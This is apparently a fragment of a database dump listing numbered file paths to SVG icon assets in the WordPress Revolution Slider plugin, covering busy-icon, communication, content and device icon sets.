(2094, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/gears1.svg'),
(2095, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/gears2.svg'),
(2096, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/glasses-moustache.svg'),
(2097, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/globe-money.svg'),
(2098, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/globe.svg'),
(2099, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/globe2.svg'),
(2100, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/graduation-hat.svg'),
(2101, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/hand-globe.svg'),
(2102, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/hand-key.svg'),
(2103, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/hand-money.svg'),
(2104, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/hand-money2.svg'),
(2105, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/handshake.svg'),
(2106, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/hat-moustache.svg'),
(2107, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/hat.svg'),
(2108, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-arrows.svg'),
(2109, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-battery.svg'),
(2110, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-check.svg'),
(2111, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-compass.svg'),
(2112, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-dollar.svg'),
(2113, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-exclamation.svg'),
(2114, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-flash.svg'),
(2115, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-gauge.svg'),
(2116, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-gears.svg'),
(2117, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-hourglass.svg'),
(2118, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-idea.svg'),
(2119, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-question.svg'),
(2120, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-structure.svg'),
(2121, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head.svg'),
(2122, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/headquarters.svg'),
(2123, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/hourglass.svg'),
(2124, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/hours.svg'),
(2125, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/incoming.svg'),
(2126, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/ingots.svg'),
(2127, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/key.svg'),
(2128, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/key2.svg'),
(2129, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/keyboard.svg'),
(2130, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/label.svg'),
(2131, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/lamp.svg'),
(2132, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/laptop-article.svg'),
(2133, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/laptop-cart.svg'),
(2134, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/laptop-chart.svg'),
(2135, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/laptop-chart2.svg'),
(2136, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/laptop-diagram.svg'),
(2137, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/laptop-envelope.svg'),
(2138, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/laptop-finance.svg'),
(2139, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/laptop-privacy.svg'),
(2140, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/laptop-settings.svg'),
(2141, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/laptop-user.svg'),
(2142, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/laptop.svg'),
(2143, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/lightbulb-green.svg'),
(2144, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/lightbulb.svg'),
(2145, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/lightning.svg'),
(2146, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/like.svg'),
(2147, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/lock.svg'),
(2148, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/magnet-money.svg'),
(2149, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/magnifying-glass.svg'),
(2150, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/manager-globe.svg'),
(2151, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/manager-idea.svg'),
(2152, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/manager01.svg'),
(2153, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/manager02.svg'),
(2154, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/meditation.svg'),
(2155, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/megaphone.svg'),
(2156, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/money-growth.svg'),
(2157, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/money-scales.svg'),
(2158, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/money.svg'),
(2159, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/money2.svg'),
(2160, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/money3.svg'),
(2161, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/money4.svg'),
(2162, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/money5.svg'),
(2163, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/money6.svg'),
(2164, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/monitor.svg'),
(2165, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/mouse.svg'),
(2166, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/nest-money.svg'),
(2167, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/newspaper-jobs.svg'),
(2168, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/newspaper-pen.svg'),
(2169, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/newspaper.svg'),
(2170, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/note-paper.svg'),
(2171, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/office-chair.svg'),
(2172, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/open-sign.svg'),
(2173, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/outgoing.svg'),
(2174, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/paper-clip.svg'),
(2175, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/paper-plane.svg'),
(2176, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/pen.svg'),
(2177, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/pen2.svg'),
(2178, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/pencil.svg'),
(2179, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/pens-pencils.svg'),
(2180, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-arrows06.svg'),
(2181, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-gears.svg'),
(2182, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-handshake.svg'),
(2183, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-idea.svg'),
(2184, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-meeting.svg'),
(2185, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-meeting02.svg'),
(2186, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-search01.svg'),
(2187, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-search02.svg'),
(2188, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-structure.svg'),
(2189, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-structure01.svg'),
(2190, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-structure02.svg'),
(2191, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-structure03.svg'),
(2192, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-structure04.svg'),
(2193, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-structure05.svg'),
(2194, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-structure06.svg'),
(2195, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-structure07.svg'),
(2196, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/percent.svg'),
(2197, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/periscopemoney.svg'),
(2198, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-arrows01.svg'),
(2199, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-arrows012.svg'),
(2200, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-arrows02.svg'),
(2201, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-arrows022.svg'),
(2202, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-arrows03.svg'),
(2203, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-checkmark.svg'),
(2204, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-cross.svg'),
(2205, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-data.svg'),
(2206, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-dollar.svg'),
(2207, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-finance.svg'),
(2208, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-flag.svg'),
(2209, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-globe.svg'),
(2210, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-idea02.svg'),
(2211, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-info.svg'),
(2212, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-puzzle.svg'),
(2213, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-scales.svg'),
(2214, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-time.svg'),
(2215, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-umbrella.svg'),
(2216, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/phone.svg'),
(2217, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/pie-chart01.svg'),
(2218, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/pie-chart02.svg'),
(2219, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/piggy-bank.svg'),
(2220, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/pin.svg'),
(2221, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/plant-money.svg'),
(2222, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/plant.svg'),
(2223, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/pound.svg'),
(2224, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/presentation.svg'),
(2225, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/presentation02.svg'),
(2226, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/preson-chart02.svg'),
(2227, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/preson-chart03.svg'),
(2228, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/preson-chart04.svg'),
(2229, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/preson-laurels.svg'),
(2230, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/preson-megaphone.svg'),
(2231, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/preson-stairs.svg'),
(2232, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/printer.svg'),
(2233, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/profile.svg'),
(2234, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/pulse.svg'),
(2235, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/puzzle.svg'),
(2236, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/quill.svg'),
(2237, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/recycle.svg'),
(2238, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/rocket.svg'),
(2239, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/rocket2.svg'),
(2240, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/ruble.svg'),
(2241, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/ruler-compasses.svg'),
(2242, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/safe.svg'),
(2243, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/sale-sign.svg'),
(2244, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/satellite-dish.svg'),
(2245, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/scales.svg'),
(2246, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/scissors.svg'),
(2247, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/security.svg'),
(2248, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/send.svg'),
(2249, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/shield.svg'),
(2250, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/shopping-cart.svg'),
(2251, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/sign.svg'),
(2252, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/smartphone-chart.svg'),
(2253, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/smartphone-exclamation.svg'),
(2254, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/smartphone-gears.svg'),
(2255, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/smartphone-growth.svg'),
(2256, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/smartphone-money.svg'),
(2257, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/smartphone-user.svg'),
(2258, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/smartphone.svg'),
(2259, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/speaker.svg'),
(2260, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/speaker02.svg'),
(2261, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/speech-bubble.svg'),
(2262, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/stamp.svg'),
(2263, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/star.svg'),
(2264, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/steering-wheel.svg'),
(2265, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/strategy03.svg'),
(2266, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/strategy1.svg'),
(2267, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/strategy2.svg'),
(2268, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/support-person.svg'),
(2269, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/tablet-article.svg'),
(2270, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/tablet-chart.svg'),
(2271, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/tablet-chart2.svg'),
(2272, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/tablet-chart3.svg'),
(2273, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/tablet-pie-chart.svg'),
(2274, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/tablet-pie-chart2.svg'),
(2275, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/tablet.svg'),
(2276, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/target.svg'),
(2277, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/team.svg'),
(2278, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/telescope.svg'),
(2279, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/tie.svg'),
(2280, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/tools.svg'),
(2281, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/tools2.svg'),
(2282, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/trash-bin.svg'),
(2283, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/umbrella.svg'),
(2284, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/user01.svg'),
(2285, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/user02.svg'),
(2286, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/user03.svg'),
(2287, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/user04.svg'),
(2288, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/user05.svg'),
(2289, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/user06.svg'),
(2290, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/user07.svg'),
(2291, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/user08.svg'),
(2292, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/user09.svg'),
(2293, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/users.svg'),
(2294, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/venn-diagram.svg'),
(2295, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/wallet.svg'),
(2296, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/wrench.svg'),
(2297, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/yen.svg'),
(2298, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/yinyang.svg'),
(2299, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_business_24px.svg'),
(2300, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_call_24px.svg'),
(2301, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_call_end_24px.svg'),
(2302, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_call_made_24px.svg'),
(2303, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_call_merge_24px.svg'),
(2304, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_call_missed_24px.svg'),
(2305, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_call_missed_outgoing_24px.svg'),
(2306, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_call_received_24px.svg'),
(2307, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_call_split_24px.svg'),
(2308, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_chat_24px.svg'),
(2309, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_chat_bubble_24px.svg'),
(2310, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_chat_bubble_outline_24px.svg'),
(2311, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_clear_all_24px.svg'),
(2312, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_comment_24px.svg'),
(2313, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_contact_mail_24px.svg'),
(2314, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_contact_phone_24px.svg'),
(2315, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_contacts_24px.svg'),
(2316, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_dialer_sip_24px.svg'),
(2317, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_dialpad_24px.svg'),
(2318, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_email_24px.svg'),
(2319, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_forum_24px.svg'),
(2320, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_import_contacts_24px.svg'),
(2321, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_import_export_24px.svg'),
(2322, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_invert_colors_off_24px.svg'),
(2323, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_live_help_24px.svg'),
(2324, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_location_off_24px.svg'),
(2325, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_location_on_24px.svg'),
(2326, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_mail_outline_24px.svg'),
(2327, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_message_24px.svg'),
(2328, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_no_sim_24px.svg'),
(2329, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_phone_24px.svg'),
(2330, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_phonelink_erase_24px.svg'),
(2331, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_phonelink_lock_24px.svg'),
(2332, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_phonelink_ring_24px.svg'),
(2333, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_phonelink_setup_24px.svg'),
(2334, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_portable_wifi_off_24px.svg'),
(2335, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_present_to_all_24px.svg'),
(2336, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_ring_volume_24px.svg'),
(2337, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_screen_share_24px.svg'),
(2338, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_speaker_phone_24px.svg'),
(2339, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_stay_current_landscape_24px.svg'),
(2340, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_stay_current_portrait_24px.svg'),
(2341, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_stay_primary_landscape_24px.svg'),
(2342, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_stay_primary_portrait_24px.svg'),
(2343, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_stop_screen_share_24px.svg'),
(2344, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_swap_calls_24px.svg'),
(2345, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_textsms_24px.svg'),
(2346, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_voicemail_24px.svg'),
(2347, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_vpn_key_24px.svg'),
(2348, 'wp-content/plugins/revslider/public/assets/assets/svg/content/ic_add_24px.svg'),
(2349, 'wp-content/plugins/revslider/public/assets/assets/svg/content/ic_add_box_24px.svg'),
(2350, 'wp-content/plugins/revslider/public/assets/assets/svg/content/ic_add_circle_24px.svg'),
(2351, 'wp-content/plugins/revslider/public/assets/assets/svg/content/ic_add_circle_outline_24px.svg'),
(2352, 'wp-content/plugins/revslider/public/assets/assets/svg/content/ic_archive_24px.svg'),
(2353, 'wp-content/plugins/revslider/public/assets/assets/svg/content/ic_backspace_24px.svg'),
(2354, 'wp-content/plugins/revslider/public/assets/assets/svg/content/ic_block_24px.svg'),
(2355, 'wp-content/plugins/revslider/public/assets/assets/svg/content/ic_clear_24px.svg'),
(2356, 'wp-content/plugins/revslider/public/assets/assets/svg/content/ic_content_copy_24px.svg'),
(2357, 'wp-content/plugins/revslider/public/assets/assets/svg/content/ic_content_cut_24px.svg'),
(2358, 'wp-content/plugins/revslider/public/assets/assets/svg/content/ic_content_paste_24px.svg'),
(2359, 'wp-content/plugins/revslider/public/assets/assets/svg/content/ic_create_24px.svg'),
(2360, 'wp-content/plugins/revslider/public/assets/assets/svg/content/ic_drafts_24px.svg'),
(2361, 'wp-content/plugins/revslider/public/assets/assets/svg/content/ic_filter_list_24px.svg'),
(2362, 'wp-content/plugins/revslider/public/assets/assets/svg/content/ic_flag_24px.svg'),
(2363, 'wp-content/plugins/revslider/public/assets/assets/svg/content/ic_font_download_24px.svg'),
(2364, 'wp-content/plugins/revslider/public/assets/assets/svg/content/ic_forward_24px.svg'),
(2365, 'wp-content/plugins/revslider/public/assets/assets/svg/content/ic_gesture_24px.svg'),
(2366, 'wp-content/plugins/revslider/public/assets/assets/svg/content/ic_inbox_24px.svg'),
(2367, 'wp-content/plugins/revslider/public/assets/assets/svg/content/ic_link_24px.svg'),
(2368, 'wp-content/plugins/revslider/public/assets/assets/svg/content/ic_mail_24px.svg'),
(2369, 'wp-content/plugins/revslider/public/assets/assets/svg/content/ic_markunread_24px.svg'),
(2370, 'wp-content/plugins/revslider/public/assets/assets/svg/content/ic_move_to_inbox_24px.svg'),
(2371, 'wp-content/plugins/revslider/public/assets/assets/svg/content/ic_next_week_24px.svg'),
(2372, 'wp-content/plugins/revslider/public/assets/assets/svg/content/ic_redo_24px.svg'),
(2373, 'wp-content/plugins/revslider/public/assets/assets/svg/content/ic_remove_24px.svg'),
(2374, 'wp-content/plugins/revslider/public/assets/assets/svg/content/ic_remove_circle_24px.svg'),
(2375, 'wp-content/plugins/revslider/public/assets/assets/svg/content/ic_remove_circle_outline_24px.svg'),
(2376, 'wp-content/plugins/revslider/public/assets/assets/svg/content/ic_reply_24px.svg'),
(2377, 'wp-content/plugins/revslider/public/assets/assets/svg/content/ic_reply_all_24px.svg'),
(2378, 'wp-content/plugins/revslider/public/assets/assets/svg/content/ic_report_24px.svg'),
(2379, 'wp-content/plugins/revslider/public/assets/assets/svg/content/ic_save_24px.svg'),
(2380, 'wp-content/plugins/revslider/public/assets/assets/svg/content/ic_select_all_24px.svg'),
(2381, 'wp-content/plugins/revslider/public/assets/assets/svg/content/ic_send_24px.svg'),
(2382, 'wp-content/plugins/revslider/public/assets/assets/svg/content/ic_sort_24px.svg'),
(2383, 'wp-content/plugins/revslider/public/assets/assets/svg/content/ic_text_format_24px.svg'),
(2384, 'wp-content/plugins/revslider/public/assets/assets/svg/content/ic_unarchive_24px.svg'),
(2385, 'wp-content/plugins/revslider/public/assets/assets/svg/content/ic_undo_24px.svg'),
(2386, 'wp-content/plugins/revslider/public/assets/assets/svg/content/ic_weekend_24px.svg'),
(2387, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_access_alarm_24px.svg'),
(2388, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_access_alarms_24px.svg'),
(2389, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_access_time_24px.svg'),
(2390, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_add_alarm_24px.svg'),
(2391, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_airplanemode_active_24px.svg'),
(2392, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_airplanemode_inactive_24px.svg'),
(2393, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_20_24px.svg'),
(2394, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_30_24px.svg'),
(2395, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_50_24px.svg'),
(2396, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_60_24px.svg'),
(2397, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_80_24px.svg'),
(2398, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_90_24px.svg'),
(2399, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_alert_24px.svg'),
